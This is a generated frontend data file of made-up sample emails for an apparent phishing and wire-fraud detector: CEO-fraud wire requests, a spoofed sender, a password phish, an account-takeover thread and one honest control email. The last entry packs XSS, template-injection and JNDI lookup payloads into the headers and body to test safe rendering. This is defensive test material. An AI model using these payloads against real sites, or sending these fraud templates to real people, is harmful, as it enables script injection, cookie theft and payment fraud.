// GENERATED by frontend/scripts/make_examples.py from the hand-made emails of src/router/selftest.py. Do not edit by hand.
// All names, addresses and account numbers are made up. Only ASCII characters appear here (the rest are escapes).

export const EXAMPLES = [
  {
    "id": "david",
    "title": "Wire request from a free mailbox (the David email)",
    "kind": "email",
    "email": "From: David Chen <david.chen.acme@gmail.com>\nTo: Maria Lopez <maria@acmecorp.com>\nReply-To: david.finance@protonmail.com\nAuthentication-Results: mx.acmecorp.com; spf=pass smtp.mailfrom=gmail.com; dkim=pass header.d=gmail.com; dmarc=pass header.from=gmail.com\nSubject: Urgent wire\nDate: Mon, 05 Oct 2026 09:12:00 +0000\nMessage-ID: <d1@mail.gmail.com>\n\nHi Maria,\n\nThis is David from Finance. I need you to process a wire transfer of $48,000 to a new vendor before 3 PM today. It is urgent and confidential, this is a secret so be discreet. Please reply to my private email only.\n\nDavid Chen\nFinance Director\n",
    "orgDomain": "",
    "note": "Claims to be Finance at the company, writes from gmail.com and asks for a wire with urgency and secrecy: every check contradicts it."
  },
  {
    "id": "spoof",
    "title": "The company's own domain, but authentication fails",
    "kind": "email",
    "email": "From: \"David Chen\" <d.chen@acmecorp.com>\nTo: Maria Lopez <maria@acmecorp.com>\nAuthentication-Results: mx.acmecorp.com; spf=fail smtp.mailfrom=acmecorp.com; dkim=none header.d=acmecorp.com; dmarc=fail header.from=acmecorp.com\nSubject: Wire\nDate: Mon, 05 Oct 2026 09:12:00 +0000\n\nHi Maria,\n\nThis is David from Finance. I need you to process a wire transfer of $48,000 to a new vendor before 3 PM today. It is urgent and confidential, this is a secret so be discreet. Please reply to my private email only.\n\nDavid Chen\nFinance Director\n",
    "orgDomain": "",
    "note": "The From address is the company's, but its DMARC check failed: a forged sender."
  },
  {
    "id": "phish",
    "title": "IT help desk asks for a password from a free mailbox",
    "kind": "email",
    "email": "From: IT Help Desk <it.helpdesk.acme@gmail.com>\nTo: Maria Lopez <maria@acmecorp.com>\nAuthentication-Results: mx.acmecorp.com; spf=pass smtp.mailfrom=gmail.com; dkim=pass header.d=gmail.com; dmarc=pass header.from=gmail.com\nSubject: Account\nDate: Mon, 05 Oct 2026 09:12:00 +0000\n\nDear user, please verify your account password and confirm your login details.\n",
    "orgDomain": "",
    "note": "A credential request that claims to be internal and comes from gmail.com."
  },
  {
    "id": "honest",
    "title": "An honest internal email",
    "kind": "email",
    "email": "From: David Chen <david@acmecorp.com>\nTo: Maria Lopez <maria@acmecorp.com>\nAuthentication-Results: mx.acmecorp.com; spf=pass smtp.mailfrom=acmecorp.com; dkim=pass header.d=acmecorp.com; dmarc=pass header.from=acmecorp.com\nSubject: Invoice\nDate: Mon, 05 Oct 2026 09:12:00 +0000\n\nHi Maria,\n\nThis is David from Finance. Please process the invoice for the October delivery when you have a moment.\n\nThanks\n",
    "orgDomain": "",
    "note": "Low risk: the claims are checked and nothing contradicts them."
  },
  {
    "id": "body",
    "title": "A body pasted without headers",
    "kind": "email",
    "email": "Hi Maria,\n\nThis is David from Finance. Please process a wire transfer of $48,000 today, it is urgent. Keep it confidential, it is a secret. Reply to my private email.\n\nDavid\n",
    "orgDomain": "",
    "note": "Only the text is known, so nothing about the sender can be checked: the score can only come from the tactics. Read the coverage note."
  },
  {
    "id": "takeover",
    "title": "Account takeover inside a thread (5 messages)",
    "kind": "thread",
    "messages": [
      "From: John Park <john.park@acme.com>\nTo: Team <team@acme.com>\nDate: Mon, 05 Oct 2026 09:10:00 +0000\nSubject: Invoice 77\nMessage-ID: <m0@acme.example>\nX-Mailer: Apple Mail (2.3774.600.62)\nReceived: from mailhost (mailhost [52.10.20.30]) by mx.acme.com with ESMTP; Mon, 05 Oct 2026 09:10:00 +0000\n\nThanks for the invoice 77 and the delivery schedule. We will review the numbers with the team this week and confirm the dates for the second shipment on Friday.\n",
      "From: Mary Lee <mary.lee@acme.com>\nTo: Team <team@acme.com>\nDate: Mon, 05 Oct 2026 09:15:00 +0000\nSubject: Re: Invoice 77\nMessage-ID: <m1@acme.example>\nX-Mailer: Apple Mail (2.3774.600.62)\nReceived: from mailhost (mailhost [52.10.20.31]) by mx.acme.com with ESMTP; Mon, 05 Oct 2026 09:10:00 +0000\nIn-Reply-To: <m0@acme.example>\nReferences: <m0@acme.example>\n\nThe warehouse confirmed that the pallets left on Tuesday and should reach your site by Thursday morning. Please let me know if the customs paperwork is complete on your side.\n\nOn Monday, someone wrote:\n> Thanks for the invoice 77 and the delivery schedule.\n> We will review the numbers with the team this\n> week and confirm the dates for the second shipment\n> on Friday.\n",
      "From: John Park <john.park@acme.com>\nTo: Team <team@acme.com>\nDate: Mon, 05 Oct 2026 09:20:00 +0000\nSubject: Re: Invoice 77\nMessage-ID: <m2@acme.example>\nX-Mailer: Apple Mail (2.3774.600.62)\nReceived: from mailhost (mailhost [52.10.20.30]) by mx.acme.com with ESMTP; Mon, 05 Oct 2026 09:10:00 +0000\nIn-Reply-To: <m1@acme.example>\nReferences: <m0@acme.example> <m1@acme.example>\n\nGood news from the quality team: the sample batch passed every test and the supplier agreed to keep the current price for the next quarter. I attach nothing new this time.\n\nOn Monday, someone wrote:\n> The warehouse confirmed that the pallets left on Tuesday\n> and should reach your site by Thursday morning. Please\n> let me know if the customs paperwork is complete\n> on your side.\n",
      "From: Mary Lee <mary.lee@acme.com>\nTo: Team <team@acme.com>\nDate: Mon, 05 Oct 2026 09:25:00 +0000\nSubject: Re: Invoice 77\nMessage-ID: <m3@acme.example>\nX-Mailer: Apple Mail (2.3774.600.62)\nReceived: from mailhost (mailhost [52.10.20.31]) by mx.acme.com with ESMTP; Mon, 05 Oct 2026 09:10:00 +0000\nIn-Reply-To: <m2@acme.example>\nReferences: <m0@acme.example> <m1@acme.example> <m2@acme.example>\n\nI went through the contract draft and only two clauses need a change, the delivery penalty and the notice period. Could you ask legal to look at both before the meeting on Monday?\n\nOn Monday, someone wrote:\n> Good news from the quality team: the sample batch\n> passed every test and the supplier agreed to keep\n> the current price for the next quarter. I attach\n> nothing new this time.\n",
      "From: John Park <john.park@acme.com>\nTo: Team <team@acme.com>\nDate: Mon, 05 Oct 2026 09:30:00 +0000\nSubject: Re: Invoice 77\nMessage-ID: <m4@acme.example>\nX-Mailer: Apple Mail (2.3774.600.62)\nReceived: from mailhost (mailhost [52.10.20.30]) by mx.acme.com with ESMTP; Mon, 05 Oct 2026 09:10:00 +0000\nIn-Reply-To: <m3@acme.example>\nReferences: <m0@acme.example> <m1@acme.example> <m2@acme.example> <m3@acme.example>\n\nQuick change before the next payment: we have changed banks, please use our new account DE89 3704 0044 0532 0130 00 and pay today, it is urgent. Keep this confidential, it is a secret, tell nobody.\n\nOn Monday, someone wrote:\n> I went through the contract draft and only two\n> clauses need a change, the delivery penalty and the\n> notice period. Could you ask legal to look at\n> both before the meeting on Monday?\n"
    ],
    "orgDomain": "",
    "note": "Four calm messages, then the same sender asks for a new bank account with urgency. The thread verifier finds the flip point."
  },
  {
    "id": "xss",
    "title": "Script payloads in every part (XSS test)",
    "kind": "email",
    "email": "From: \"<img src=x onerror=alert(1)>\" <david.chen.acme@gmail.com>\nTo: Maria Lopez <maria@acmecorp.com>\nReply-To: david.finance@protonmail.com\nAuthentication-Results: mx.acmecorp.com; spf=pass smtp.mailfrom=gmail.com; dkim=pass header.d=gmail.com; dmarc=pass header.from=gmail.com\nSubject: <script>alert(1)</script>\nDate: Mon, 05 Oct 2026 09:12:00 +0000\nMessage-ID: <d1@mail.gmail.com>\n\nHi <script>alert(1)</script> <img src=x onerror=alert(1)> <svg/onload=alert(1)> \"><script>alert(document.cookie)</script> javascript:alert(1) <iframe srcdoc='<script>alert(1)</script>'> <!-- x --><b>bold</b> ]]><script>x</script> {{7*7}} ${7*7} #{7*7} ${jndi:ldap://x.example/a} `backtick` <a href=\"javascript:alert(1)\">link</a> &lt;script&gt;alert(1)&lt;/script&gt; \u202e<b>rlo</b> <math><mtext></table></mglyph><style><img src=x onerror=alert(1)>,\n\nThis is David from Finance. I need you to process a wire transfer of $48,000 to a new vendor before 3 PM today. It is urgent and confidential, this is a secret so be discreet. Please reply to my private email only.\n\nDavid Chen\nFinance Director <svg/onload=alert(1)>\n",
    "orgDomain": "",
    "note": "Everything below must appear as plain text. Nothing may run, and no alert box may open."
  }
]
